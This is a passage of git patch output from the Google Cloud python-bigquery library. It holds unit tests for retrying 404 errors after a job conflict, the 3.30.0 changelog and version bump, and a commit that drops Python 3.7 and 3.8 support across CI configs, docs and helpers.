+ deadline=_DEFAULT_RETRY_DEADLINE, +) +"""Private, may be removed in future.""" + + DEFAULT_GET_JOB_TIMEOUT = 128 """ Default timeout for Client.get_job(). diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 6897c2552..4f13d6ecc 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -28,9 +28,12 @@ from unittest import mock import warnings -import requests +import freezegun import packaging import pytest +import requests + +import google.api try: @@ -55,6 +58,8 @@ import google.cloud._helpers from google.cloud import bigquery +from google.cloud.bigquery import job as bqjob +import google.cloud.bigquery._job_helpers from google.cloud.bigquery.dataset import DatasetReference from google.cloud.bigquery import exceptions from google.cloud.bigquery import ParquetOptions @@ -5308,6 +5313,173 @@ def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails(self): with pytest.raises(DataLoss, match="we lost your job, sorry"): client.query("SELECT 1;", job_id=None) + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_fails_no_retries(self): + from google.api_core.exceptions import Conflict + from google.api_core.exceptions import DataLoss + from google.cloud.bigquery.job import QueryJob + + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + + job_create_error = Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + QueryJob, "_begin", side_effect=job_create_error + ) + get_job_patcher = mock.patch.object( + client, "get_job", side_effect=DataLoss("we lost your job, sorry") + ) + + with job_begin_patcher, get_job_patcher: + # If get job request fails but supposedly there does exist a job + # with this ID already, raise the exception explaining why we + # couldn't recover the job. 
+ with pytest.raises(DataLoss, match="we lost your job, sorry"): + client.query( + "SELECT 1;", + job_id=None, + # Explicitly test with no retries to make sure those branches are covered. + retry=None, + job_retry=None, + ) + + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404(self): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404, but we know + because of the conflict that really the job does exist. Retry until we + get the job status (or timeout). + """ + job_id = "abc123" + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + conn = client._connection = make_connection( + # We're mocking QueryJob._begin, so this is only going to be + # jobs.get requests and responses. + google.api_core.exceptions.TooManyRequests("this is retriable by default"), + google.api_core.exceptions.NotFound("we lost your job"), + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": self.PROJECT, + "location": "TESTLOC", + "jobId": job_id, + } + }, + ) + + job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + return_value=job_id, + ) + + with job_begin_patcher, job_id_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). 
+ result = client.query("SELECT 1;", job_id=None) + + jobs_get_path = mock.call( + method="GET", + path=f"/projects/{self.PROJECT}/jobs/{job_id}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. + [jobs_get_path] + * 4, + ) + assert result.job_id == job_id + + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_retries_404_and_query_job_insert( + self, + ): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2134 + + Sometimes after a Conflict, the fetch fails with a 404. If it keeps + failing with a 404, assume that the job actually doesn't exist. + """ + job_id_1 = "abc123" + job_id_2 = "xyz789" + creds = _make_credentials() + http = object() + client = self._make_one(project=self.PROJECT, credentials=creds, _http=http) + + # We're mocking QueryJob._begin, so that the connection should only get + # jobs.get requests. + job_create_error = google.api_core.exceptions.Conflict("Job already exists.") + job_begin_patcher = mock.patch.object( + bqjob.QueryJob, "_begin", side_effect=job_create_error + ) + conn = client._connection = make_connection( + google.api_core.exceptions.NotFound("we lost your job again, sorry"), + { + "jobReference": { + "projectId": self.PROJECT, + "location": "TESTLOC", + "jobId": job_id_2, + } + }, + ) + + # Choose a small deadline so the 404 retries give up. + retry = ( + google.cloud.bigquery.retry._DEFAULT_GET_JOB_CONFLICT_RETRY.with_deadline(1) + ) + job_id_patcher = mock.patch.object( + google.cloud.bigquery._job_helpers, + "make_job_id", + side_effect=[job_id_1, job_id_2], + ) + retry_patcher = mock.patch.object( + google.cloud.bigquery.retry, + "_DEFAULT_GET_JOB_CONFLICT_RETRY", + retry, + ) + + with freezegun.freeze_time( + "2025-01-01 00:00:00", + # 10x the retry deadline to guarantee a timeout. 
+ auto_tick_seconds=10, + ), job_begin_patcher, job_id_patcher, retry_patcher: + # If get job request fails there does exist a job + # with this ID already, retry 404 until we get it (or fails for a + # non-retriable reason, see other tests). + result = client.query("SELECT 1;", job_id=None) + + jobs_get_path_1 = mock.call( + method="GET", + path=f"/projects/{self.PROJECT}/jobs/{job_id_1}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + jobs_get_path_2 = mock.call( + method="GET", + path=f"/projects/{self.PROJECT}/jobs/{job_id_2}", + query_params={ + "projection": "full", + }, + timeout=google.cloud.bigquery.retry.DEFAULT_GET_JOB_TIMEOUT, + ) + conn.api_request.assert_has_calls( + # Double-check that it was jobs.get that was called for each of our + # mocked responses. + [jobs_get_path_1, jobs_get_path_2], + ) + assert result.job_id == job_id_2 + def test_query_job_rpc_fail_w_conflict_random_id_job_fetch_succeeds(self): from google.api_core.exceptions import Conflict from google.cloud.bigquery.job import QueryJob From 3a1e3f3378f370986298b9bca652fdf2b5d9d14e Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Thu, 27 Feb 2025 10:42:38 -0800 Subject: [PATCH 069/202] chore(main): release 3.30.0 (#2119) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 26 ++++++++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 27 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 45c39e19c..91d0a362d 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,32 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.30.0](https://github.com/googleapis/python-bigquery/compare/v3.29.0...v3.30.0) (2025-02-26) + + +### Features + +* Add roundingmode enum, wiring, and tests 
([#2121](https://github.com/googleapis/python-bigquery/issues/2121)) ([3a48948](https://github.com/googleapis/python-bigquery/commit/3a4894827f6e73a4a88cb22933c2004697dabcc7)) +* Adds foreign_type_info attribute to table class and adds unit tests. ([#2126](https://github.com/googleapis/python-bigquery/issues/2126)) ([2c19681](https://github.com/googleapis/python-bigquery/commit/2c1968115bef8e1dc84e0125615f551b9b011a4b)) +* Support resource_tags for table ([#2093](https://github.com/googleapis/python-bigquery/issues/2093)) ([d4070ca](https://github.com/googleapis/python-bigquery/commit/d4070ca21b5797e900a9e87b966837ee1c278217)) + + +### Bug Fixes + +* Avoid blocking in download thread when using BQ Storage API ([#2034](https://github.com/googleapis/python-bigquery/issues/2034)) ([54c8d07](https://github.com/googleapis/python-bigquery/commit/54c8d07f06a8ae460c9e0fb1614e1fbc21efb5df)) +* Retry 404 errors in `Client.query(...)` ([#2135](https://github.com/googleapis/python-bigquery/issues/2135)) ([c6d5f8a](https://github.com/googleapis/python-bigquery/commit/c6d5f8aaec21ab8f17436407aded4bc2316323fd)) + + +### Dependencies + +* Updates required checks list in github ([#2136](https://github.com/googleapis/python-bigquery/issues/2136)) ([fea49ff](https://github.com/googleapis/python-bigquery/commit/fea49ffbf8aa1d53451864ceb7fd73189b6661cb)) +* Use pandas-gbq to determine schema in `load_table_from_dataframe` ([#2095](https://github.com/googleapis/python-bigquery/issues/2095)) ([7603bd7](https://github.com/googleapis/python-bigquery/commit/7603bd71d60592ef2a551d9eea09987b218edc73)) + + +### Documentation + +* Update magics.rst ([#2125](https://github.com/googleapis/python-bigquery/issues/2125)) ([b5bcfb3](https://github.com/googleapis/python-bigquery/commit/b5bcfb303d27015b747a3b0747ecd7f7ed0ed557)) + ## [3.29.0](https://github.com/googleapis/python-bigquery/compare/v3.28.0...v3.29.0) (2025-01-21) diff --git a/google/cloud/bigquery/version.py 
b/google/cloud/bigquery/version.py index 3d852b8a3..01c4c51ca 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.29.0" +__version__ = "3.30.0" From fb7de398cb2ad000b80a8a702d1f6539dc03d8e0 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 28 Feb 2025 13:14:05 -0500 Subject: [PATCH 070/202] deps: Remove Python 3.7 and 3.8 as supported runtimes (#2133) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Initial batch of changes to remove 3.7 and 3.8 * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * more updates to remove 3.7 and 3.8 * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates samples/geography/reqs * updates samples/magics/reqs * updates samples/notebooks/reqs * updates linting * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates conf due to linting issue * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates reqs.txt, fix mypy, lint, and debug in noxfile * Updates owlbot to correct spacing issue in conf.py * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * updates owlbot imports * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * removes kokoro samples configs for 3.7 & 3.8 * πŸ¦‰ Updates from 
OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * removes owlbots attempt to restore kokoro samples configs * removes kokoro system-3.8.cfg * edits repo sync settings * updates assorted noxfiles for samples and pyproject.toml * update test-samples-impl.sh * updates install_deps template * Edits to the contributing documentation * deps: use pandas-gbq to determine schema in `load_table_from_dataframe` (#2095) * feat: use pandas-gbq to determine schema in `load_table_from_dataframe` * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * fix some unit tests * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * bump minimum pandas-gbq to 0.26.1 * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * drop pandas-gbq from python 3.7 extras * relax warning message text assertion * use consistent time zone presence/absence in time datetime system test * Update google/cloud/bigquery/_pandas_helpers.py * Update google/cloud/bigquery/_pandas_helpers.py Co-authored-by: Chalmer Lowe * remove pandas-gbq from at least 1 unit test and system test session --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe * Feat: Adds foreign_type_info attribute to table class and adds unit tests. 
(#2126) * adds foreign_type_info attribute to table * feat: Adds foreign_type_info attribute and tests * updates docstrings for foreign_type_info * Updates property handling, especially as regards set/get_sub_prop * Removes extraneous comments and debug expressions * Refactors build_resource_from_properties w get/set_sub_prop * updates to foreign_type_info, tests and wiring * Adds logic to detect non-Sequence schema.fields value * updates assorted tests and logic * deps: updates required checks list in github (#2136) * deps: updates required checks list in github * deps: updates snippet and system checks in github to remove 3.9 * changes the order of two items in the list. * updates linting * reverts pandas back to 1.1.0 * Revert changes related to pandas <1.5 * Revert noxfile.py changes related to pandas <1.5 * Revert constraints-3.9 changes related to pandas <1.5 * Revert test_query_pandas.py changes related to pandas <1.5 * Revert test__pandas_helpers.py changes related to pandas <1.5 * Revert test__versions_helpers.py changes related to pandas <1.5 * Revert tnoxfile.py changes related to pandas <1.5 * Revert test__versions_helpers.py changes related to pandas <1.5 * Revert test_table.py changes related to pandas <1.5 * Update noxfile changes related to pandas <1.5 * Update pyproject.toml changes related to pandas <1.5 * Update constraints-3.9.txt changes related to pandas <1.5 * Update test_legacy_types.py changes related to pandas <1.5 * Updates magics.py as part of reverting from pandas 1.5 * Updates noxfile.py in reverting from pandas 1.5 * Updates pyproject.toml in reverting from pandas 1.5 * Updates constraints.txt in reverting from pandas 1.5 * Updates test_magics in reverting from pandas 1.5 * Updates test_table in reverting from pandas 1.5 * Updates in tests re: reverting from pandas 1.5 * Updates pyproject to match constraints.txt * updates pyproject.toml to mirror constraints * remove limit on virtualenv * updates owlbot.py for test-samples-impl.sh * 
updates to owlbot.py * updates to test-samples-impl.sh * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * further updates to owlbot.py * removes unneeded files * adds presubmit.cfg back in --------- Co-authored-by: Owl Bot Co-authored-by: Tim SweΓ±a (Swast) --- .coveragerc | 2 +- .../{snippets-3.8.cfg => snippets-3.9.cfg} | 2 +- .../{system-3.8.cfg => system-3.9.cfg} | 4 +- .kokoro/samples/python3.7/common.cfg | 40 ----------- .kokoro/samples/python3.7/continuous.cfg | 6 -- .kokoro/samples/python3.7/periodic-head.cfg | 11 ---- .kokoro/samples/python3.7/periodic.cfg | 6 -- .kokoro/samples/python3.7/presubmit.cfg | 6 -- .kokoro/samples/python3.8/common.cfg | 40 ----------- .kokoro/samples/python3.8/continuous.cfg | 6 -- .kokoro/samples/python3.8/periodic-head.cfg | 11 ---- .kokoro/samples/python3.8/periodic.cfg | 6 -- .kokoro/samples/python3.8/presubmit.cfg | 6 -- .kokoro/test-samples-impl.sh | 3 +- CONTRIBUTING.rst | 15 ++--- README.rst | 4 +- google/cloud/bigquery/__init__.py | 6 +- google/cloud/bigquery/_pandas_helpers.py | 9 ++- google/cloud/bigquery/_pyarrow_helpers.py | 14 ++-- google/cloud/bigquery/external_config.py | 6 +- google/cloud/bigquery/format_options.py | 4 +- google/cloud/bigquery/job/base.py | 4 +- google/cloud/bigquery/magics/magics.py | 1 - google/cloud/bigquery/model.py | 2 +- google/cloud/bigquery/routine/routine.py | 16 +++-- google/cloud/bigquery/schema.py | 6 +- google/cloud/bigquery/table.py | 14 ++-- noxfile.py | 43 ++++++++---- owlbot.py | 66 ++++++++++++++++++- pyproject.toml | 21 +++--- samples/desktopapp/noxfile.py | 4 +- samples/desktopapp/requirements-test.txt | 3 +- samples/desktopapp/user_credentials_test.py | 9 +-- samples/geography/noxfile.py | 4 +- samples/geography/requirements-test.txt | 3 +- samples/geography/requirements.txt | 56 +++++----------- samples/magics/conftest.py | 6 +- samples/magics/noxfile.py | 4 +- 
samples/magics/requirements-test.txt | 3 +- samples/magics/requirements.txt | 8 +-- samples/notebooks/jupyter_tutorial_test.py | 4 +- samples/notebooks/noxfile.py | 4 +- samples/notebooks/requirements-test.txt | 3 +- samples/notebooks/requirements.txt | 10 +-- samples/snippets/noxfile.py | 4 +- samples/snippets/requirements-test.txt | 3 +- .../templates/install_deps.tmpl.rst | 2 +- testing/constraints-3.7.txt | 36 ---------- testing/constraints-3.8.txt | 11 ---- testing/constraints-3.9.txt | 26 +++++++- tests/system/test_pandas.py | 7 +- tests/unit/job/test_copy.py | 1 - tests/unit/job/test_query_pandas.py | 2 + tests/unit/test__pandas_helpers.py | 5 +- tests/unit/test__versions_helpers.py | 9 ++- tests/unit/test_legacy_types.py | 4 +- tests/unit/test_magics.py | 1 + tests/unit/test_table.py | 27 ++++---- tests/unit/test_table_pandas.py | 12 ++-- 59 files changed, 274 insertions(+), 377 deletions(-) rename .kokoro/presubmit/{snippets-3.8.cfg => snippets-3.9.cfg} (82%) rename .kokoro/presubmit/{system-3.8.cfg => system-3.9.cfg} (81%) delete mode 100644 .kokoro/samples/python3.7/common.cfg delete mode 100644 .kokoro/samples/python3.7/continuous.cfg delete mode 100644 .kokoro/samples/python3.7/periodic-head.cfg delete mode 100644 .kokoro/samples/python3.7/periodic.cfg delete mode 100644 .kokoro/samples/python3.7/presubmit.cfg delete mode 100644 .kokoro/samples/python3.8/common.cfg delete mode 100644 .kokoro/samples/python3.8/continuous.cfg delete mode 100644 .kokoro/samples/python3.8/periodic-head.cfg delete mode 100644 .kokoro/samples/python3.8/periodic.cfg delete mode 100644 .kokoro/samples/python3.8/presubmit.cfg delete mode 100644 testing/constraints-3.7.txt delete mode 100644 testing/constraints-3.8.txt diff --git a/.coveragerc b/.coveragerc index 04092257a..e78e7a931 100644 --- a/.coveragerc +++ b/.coveragerc @@ -9,6 +9,6 @@ omit = google/cloud/bigquery_v2/* # Legacy proto-based types. 
exclude_lines = # Re-enable the standard pragma - pragma: NO COVER + pragma: (no cover|NO COVER) # Ignore debug-only repr def __repr__ diff --git a/.kokoro/presubmit/snippets-3.8.cfg b/.kokoro/presubmit/snippets-3.9.cfg similarity index 82% rename from .kokoro/presubmit/snippets-3.8.cfg rename to .kokoro/presubmit/snippets-3.9.cfg index 840d9e716..d1de209a2 100644 --- a/.kokoro/presubmit/snippets-3.8.cfg +++ b/.kokoro/presubmit/snippets-3.9.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "snippets-3.8" + value: "snippets-3.9" } diff --git a/.kokoro/presubmit/system-3.8.cfg b/.kokoro/presubmit/system-3.9.cfg similarity index 81% rename from .kokoro/presubmit/system-3.8.cfg rename to .kokoro/presubmit/system-3.9.cfg index f4bcee3db..bd1fb514b 100644 --- a/.kokoro/presubmit/system-3.8.cfg +++ b/.kokoro/presubmit/system-3.9.cfg @@ -3,5 +3,5 @@ # Only run this nox session. env_vars: { key: "NOX_SESSION" - value: "system-3.8" -} \ No newline at end of file + value: "system-3.9" +} diff --git a/.kokoro/samples/python3.7/common.cfg b/.kokoro/samples/python3.7/common.cfg deleted file mode 100644 index d30dc6018..000000000 --- a/.kokoro/samples/python3.7/common.cfg +++ /dev/null @@ -1,40 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Specify which tests to run -env_vars: { - key: "RUN_TESTS_SESSION" - value: "py-3.7" -} - -# Declare build specific Cloud project. -env_vars: { - key: "BUILD_SPECIFIC_GCLOUD_PROJECT" - value: "python-docs-samples-tests-py37" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples.sh" -} - -# Configure the docker image for kokoro-trampoline. 
-env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" -} - -# Download secrets for samples -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. -build_file: "python-bigquery/.kokoro/trampoline_v2.sh" \ No newline at end of file diff --git a/.kokoro/samples/python3.7/continuous.cfg b/.kokoro/samples/python3.7/continuous.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.7/continuous.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/samples/python3.7/periodic-head.cfg b/.kokoro/samples/python3.7/periodic-head.cfg deleted file mode 100644 index 5aa01bab5..000000000 --- a/.kokoro/samples/python3.7/periodic-head.cfg +++ /dev/null @@ -1,11 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" -} diff --git a/.kokoro/samples/python3.7/periodic.cfg b/.kokoro/samples/python3.7/periodic.cfg deleted file mode 100644 index 71cd1e597..000000000 --- a/.kokoro/samples/python3.7/periodic.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "False" -} diff --git a/.kokoro/samples/python3.7/presubmit.cfg b/.kokoro/samples/python3.7/presubmit.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.7/presubmit.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: 
"INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/samples/python3.8/common.cfg b/.kokoro/samples/python3.8/common.cfg deleted file mode 100644 index 46759c6d6..000000000 --- a/.kokoro/samples/python3.8/common.cfg +++ /dev/null @@ -1,40 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -# Build logs will be here -action { - define_artifacts { - regex: "**/*sponge_log.xml" - } -} - -# Specify which tests to run -env_vars: { - key: "RUN_TESTS_SESSION" - value: "py-3.8" -} - -# Declare build specific Cloud project. -env_vars: { - key: "BUILD_SPECIFIC_GCLOUD_PROJECT" - value: "python-docs-samples-tests-py38" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples.sh" -} - -# Configure the docker image for kokoro-trampoline. -env_vars: { - key: "TRAMPOLINE_IMAGE" - value: "gcr.io/cloud-devrel-kokoro-resources/python-samples-testing-docker" -} - -# Download secrets for samples -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/python-docs-samples" - -# Download trampoline resources. -gfile_resources: "/bigstore/cloud-devrel-kokoro-resources/trampoline" - -# Use the trampoline script to run in docker. 
-build_file: "python-bigquery/.kokoro/trampoline_v2.sh" \ No newline at end of file diff --git a/.kokoro/samples/python3.8/continuous.cfg b/.kokoro/samples/python3.8/continuous.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.8/continuous.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/samples/python3.8/periodic-head.cfg b/.kokoro/samples/python3.8/periodic-head.cfg deleted file mode 100644 index 5aa01bab5..000000000 --- a/.kokoro/samples/python3.8/periodic-head.cfg +++ /dev/null @@ -1,11 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} - -env_vars: { - key: "TRAMPOLINE_BUILD_FILE" - value: "github/python-bigquery/.kokoro/test-samples-against-head.sh" -} diff --git a/.kokoro/samples/python3.8/periodic.cfg b/.kokoro/samples/python3.8/periodic.cfg deleted file mode 100644 index 71cd1e597..000000000 --- a/.kokoro/samples/python3.8/periodic.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "False" -} diff --git a/.kokoro/samples/python3.8/presubmit.cfg b/.kokoro/samples/python3.8/presubmit.cfg deleted file mode 100644 index a1c8d9759..000000000 --- a/.kokoro/samples/python3.8/presubmit.cfg +++ /dev/null @@ -1,6 +0,0 @@ -# Format: //devtools/kokoro/config/proto/build.proto - -env_vars: { - key: "INSTALL_LIBRARY_FROM_SOURCE" - value: "True" -} \ No newline at end of file diff --git a/.kokoro/test-samples-impl.sh b/.kokoro/test-samples-impl.sh index 53e365bc4..40e248822 100755 --- a/.kokoro/test-samples-impl.sh +++ b/.kokoro/test-samples-impl.sh @@ -33,8 +33,7 @@ export PYTHONUNBUFFERED=1 env | grep KOKORO # Install nox -# `virtualenv==20.26.6` is added for Python 3.7 compatibility -python3.9 -m pip 
install --upgrade --quiet nox virtualenv==20.26.6 +python3.9 -m pip install --upgrade --quiet nox virtualenv # Use secrets acessor service account to get secrets if [[ -f "${KOKORO_GFILE_DIR}/secrets_viewer_service_account.json" ]]; then diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst index 1900c5e36..8f4d54bce 100644 --- a/CONTRIBUTING.rst +++ b/CONTRIBUTING.rst @@ -22,7 +22,7 @@ In order to add a feature: documentation. - The feature must work fully on the following CPython versions: - 3.7, 3.8, 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. + 3.9, 3.10, 3.11, 3.12 and 3.13 on both UNIX and Windows. - The feature must not add unnecessary dependencies (where "unnecessary" is of course subjective, but new dependencies should @@ -143,13 +143,12 @@ Running System Tests $ nox -s system # Run a single system test - $ nox -s system-3.8 -- -k + $ nox -s system-3.9 -- -k .. note:: - System tests are only configured to run under Python 3.8. - For expediency, we do not run them in older versions of Python 3. + System tests are configured to run under Python 3.9, 3.11, 3.12. This alone will not run the tests. You'll need to change some local auth settings and change some configuration in your project to @@ -195,11 +194,11 @@ configure them just like the System Tests. # Run all tests in a folder $ cd samples/snippets - $ nox -s py-3.8 + $ nox -s py-3.9 # Run a single sample test $ cd samples/snippets - $ nox -s py-3.8 -- -k + $ nox -s py-3.9 -- -k ******************************************** Note About ``README`` as it pertains to PyPI @@ -221,16 +220,12 @@ Supported Python Versions We support: -- `Python 3.7`_ -- `Python 3.8`_ - `Python 3.9`_ - `Python 3.10`_ - `Python 3.11`_ - `Python 3.12`_ - `Python 3.13`_ -.. _Python 3.7: https://docs.python.org/3.7/ -.. _Python 3.8: https://docs.python.org/3.8/ .. _Python 3.9: https://docs.python.org/3.9/ .. _Python 3.10: https://docs.python.org/3.10/ .. 
_Python 3.11: https://docs.python.org/3.11/ diff --git a/README.rst b/README.rst index f81adc4b9..29e15e067 100644 --- a/README.rst +++ b/README.rst @@ -52,11 +52,11 @@ dependencies. Supported Python Versions ^^^^^^^^^^^^^^^^^^^^^^^^^ -Python >= 3.7 +Python >= 3.9 Unsupported Python Versions ^^^^^^^^^^^^^^^^^^^^^^^^^^^ -Python == 2.7, Python == 3.5, Python == 3.6. +Python == 2.7, Python == 3.5, Python == 3.6, Python == 3.7, and Python == 3.8. The last version of this library compatible with Python 2.7 and 3.5 is `google-cloud-bigquery==1.28.0`. diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index caf75333a..d39c71641 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -126,12 +126,12 @@ if sys_major == 3 and sys_minor in (7, 8): warnings.warn( - "The python-bigquery library will stop supporting Python 3.7 " - "and Python 3.8 in a future major release expected in Q4 2024. " + "The python-bigquery library no longer supports Python 3.7 " + "and Python 3.8. " f"Your Python version is {sys_major}.{sys_minor}.{sys_micro}. We " "recommend that you update soon to ensure ongoing support. For " "more details, see: [Google Cloud Client Libraries Supported Python Versions policy](https://cloud.google.com/python/docs/supported-python-versions)", - PendingDeprecationWarning, + FutureWarning, ) __all__ = [ diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 0017d92ce..feb6b3adb 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -336,8 +336,13 @@ def types_mapper(arrow_data_type): ): return range_date_dtype - elif range_timestamp_dtype is not None and arrow_data_type.equals( - range_timestamp_dtype.pyarrow_dtype + # TODO: this section does not have a test yet OR at least not one that is + # recognized by coverage, hence the pragma. 
See Issue: #2132 + elif ( + range_timestamp_dtype is not None + and arrow_data_type.equals( # pragma: NO COVER + range_timestamp_dtype.pyarrow_dtype + ) ): return range_timestamp_dtype diff --git a/google/cloud/bigquery/_pyarrow_helpers.py b/google/cloud/bigquery/_pyarrow_helpers.py index 1b42cd5c7..034e020ee 100644 --- a/google/cloud/bigquery/_pyarrow_helpers.py +++ b/google/cloud/bigquery/_pyarrow_helpers.py @@ -21,8 +21,6 @@ from typing import Any -from packaging import version - try: import pyarrow # type: ignore except ImportError: @@ -101,14 +99,10 @@ def pyarrow_timestamp(): pyarrow.decimal128(38, scale=9).id: "NUMERIC", } - # Adds bignumeric support only if pyarrow version >= 3.0.0 - # Decimal256 support was added to arrow 3.0.0 - # https://arrow.apache.org/blog/2021/01/25/3.0.0-release/ - if version.parse(pyarrow.__version__) >= version.parse("3.0.0"): - _BQ_TO_ARROW_SCALARS["BIGNUMERIC"] = pyarrow_bignumeric - # The exact decimal's scale and precision are not important, as only - # the type ID matters, and it's the same for all decimal256 instances. - _ARROW_SCALAR_IDS_TO_BQ[pyarrow.decimal256(76, scale=38).id] = "BIGNUMERIC" + _BQ_TO_ARROW_SCALARS["BIGNUMERIC"] = pyarrow_bignumeric + # The exact decimal's scale and precision are not important, as only + # the type ID matters, and it's the same for all decimal256 instances. 
